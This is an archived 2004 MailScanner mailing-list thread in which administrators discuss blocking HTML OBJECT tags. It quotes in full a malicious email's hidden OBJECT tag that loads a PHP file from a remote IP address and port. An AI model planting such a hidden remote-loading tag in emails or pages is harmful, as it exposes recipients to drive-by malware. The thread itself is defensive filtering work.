Dangerous html tag?

Remco Barendse mailscanner at BARENDSE.TO
Thu Mar 18 12:02:03 GMT 2004


I haven't got a clue whether Object Tags are ever used for something
legit.

Could you make the Object Codebase look at the allowed / disallowed
extension list? Any file we do not allow as an attachment form should be
utterly destroyed when in Object Codebase?

This would allow mails with images and other stuff we may allow but not
objectionable content.

Just an idea :)

On Thu, 18 Mar 2004, Julian Field wrote:

> I now block all Object Data tags as well as Object Codebase.
> Whether I want to block all Object tags is up for discussion.
> Your thoughts please?
>
> At 08:43 18/03/2004, you wrote:
> >I have this in MailScanner.conf:
> >
> >Allow Object Codebase Tags = no
> >Convert Dangerous HTML To Text = yes
> >
> >Should this have killed that tag, if so it didn't!
> >
> >Maybe it's a good idea to block every tag with:
> >OBJECT STYLE="display:none" DATA="
> >it will not show any thing anyway therefore can only be malicious?
> >
> >
> >On Thu, 18 Mar 2004, Michele Neylon :: Blacknight Solutions wrote:
> >
> > > You could block the OBJECT tag
> > >
> > > Mr. Michele Neylon
> > > Blacknight Internet Solutions Ltd
> > > http://www.blacknightsolutions.ie/
> > > http://www.search.ie/
> > > Tel. + 353 (0)59 9137101
> > > Lowest price domains in Ireland
> > >
> > > > -----Original Message-----
> > > > From: MailScanner mailing list [mailto:MAILSCANNER at JISCMAIL.AC.UK]On
> > > > Behalf Of Remco Barendse
> > > > Sent: 18 March 2004 08:04
> > > > To: MAILSCANNER at JISCMAIL.AC.UK
> > > > Subject: [MAILSCANNER] Dangerous html tag?
> > > >
> > > >
> > > > Hi!
> > > >
> > > > I just received a message that contained ActiveX controls, nothing would
> > > > show up in Outlook.
> > > >
> > > > I opened the mail and tried to look inside, this is the contents: (I
> > would
> > > > *NOT* try the url below on any windows/X browser)
> > > >
> > > > <html><body>
> > > > <font  face="System">
> > > > <OBJECT STYLE="display:none" DATA="http://68.6.144.228:81/185869.php">
> > > > </OBJECT></body></html>
> > > >
> > > > I tried opening the .php file to see what it is (although I have a pretty
> > > > good guess) but it failed because my firewall blocked port 81.
> > > >
> > > > Can we ban/kill/modify any such tags or will this ruin every e-mail with
> > > > some pictures in it?
> > > >
> > > > Thanks!
> > > > Remco
> > > >
> > >
> > >
> > > --
> > > Email scanned by Blacknight for viruses and dangerous content.
> > > Visit http://www.blacknight.ie for more information
> > >
>
> --
> Julian Field
> www.MailScanner.info
> MailScanner thanks transtec Computers for their support
>
> PGP footprint: EE81 D763 3DB0 0BFD E1DC 7222 11F6 5947 1415 B654
>



More information about the MailScanner mailing list